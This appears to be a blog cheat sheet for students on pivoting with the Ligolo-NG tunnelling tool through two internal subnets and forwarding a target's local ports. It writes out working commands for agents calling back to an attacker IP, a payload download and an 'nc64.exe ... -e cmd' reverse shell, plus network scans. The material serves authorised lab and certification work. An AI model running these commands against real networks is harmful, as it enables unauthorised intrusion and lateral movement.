Add a header to begin generating the table of contents
Saw plenty students struggling with Ligolo-NG, so not to loose time after you read THIS to understand the logic, you can go with this fast table
I recommend using the most stable version 0.6.2 of Ligolo-NG (never failed me)
Download the 3 files:
PROXY -> here
AGENT.EXE for Windows -> here
AGENT for Linux -> here
Setup with your configuration
NOTE: auto-derives 10.10.10.0/24 range
NOTE: auto-derives 11.11.11.0/24 range
1st Pivot on 1st internal range
1) Create and bring up tunnel1 (kali terminal)
NOTE: requires sudo rights
sudo ip tuntap add user root mode tun tunnel1
sudo ip link set tunnel1 up2) Start Ligolo proxy server on Kali (again sudo rights)
sudo ./proxy -selfcert3) Upload agent.exe / agent and connect back to Kali Ligolo Server
NOTE: on the 1st target machine, run the agent.exe / agent to connect to your TUN0 IP
.\agent.exe -connect 192.168.45.176:11601 -ignore-cert./agent -connect 192.168.45.176:11601 -ignore-cert4) In Ligolo proxy ui: select the agent and start tunnel1
Note: once connected press Enter and select the agent with arrows, then run:
start --tun tunnel15) Add route to the target subnet
Note: this command is done in a new Kali terminal
sudo ip route add 10.10.10.0/24 dev tunnel16) Listener on tunnel1
Note: lets new hosts reach the proxy to establish tunnels
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp7) Test reachability using netexec
netexec smb 10.10.10.0/242nd Pivot on 2nd internal range
1) Create and bring up tunnel2 (kali terminal)
NOTE: repeating the first steps but for tunnel2 now as follows
sudo ip tuntap add user root mode tun tunnel2
sudo ip link set tunnel2 up2) Connect new agent (from 2nd target) to 1st target internal IP
.\agent.exe -connect 10.10.10.10:11601 -ignore-cert3) Once connected in the proxy UI, select with the arrows the new connection that appeared in proxy and hit enter
NOTE: make sure you are on the right connection.Once entered connect to tunnel2 with:
start --tun tunnel24) Add route to 2nd internal subnet
NOTE: using the 2nd target internal IP
sudo ip route add 11.11.11.0/24 dev tunnel25) Add listeners for whitelisted ports (443, 80) - PORT FORWARDING STEP
NOTE: using whitelisted ports like 443, 80 (this will work most of the time)
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcplistener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp6) Download from 2nd target using 1st internal
wget http://10.10.10.10/ph03n1x -outfile ph03n1x7) Catch reverse shell from 2nd target on your Kali IP
NOTE: using whitelisted ports like 443, 80 (this will work most of the time)
nc64.exe 10.10.10.10 443 -e cmd8) Test reachability on 2nd subnet
netexec smb 11.11.11.0/24Local Port Forwarding to your Kali
Have you found a website that’s accesible only from the target or a service that runs only on the target machine?
Then it’s time to do a local port forwading, fast and easy, where you don’t need proxychains to reach it!
Works in terminal (with any tool to be reached) and Firefox (if it’s a website)
1) On your Kali terminal, create a new network called ligolo
NOTE: requires sudo rights
sudo ip tuntap add user root mode tun ligolosudo ip link set ligolo up2) Connect agent to your proxy
NOTE: this uses your TUN0 IP dynamically
.\agent.exe -connect 192.168.45.176:11601 -ignore-cert3) In proxy UI, select the new connection and attach it to ligolo
start --tun ligolo4) Add the magic route to access all internal ports locally on Kali
sudo ip route add 240.0.0.1/32 dev ligoloNow you can access any local port directly via
240.0.0.1 from Kali5) Verify forwarding with Nmap
NOTE: you should see the local ports running on the target (previously visible only on the target itself).
Now they are reachable from Kali without proxychains.
nmap -p- 240.0.0.1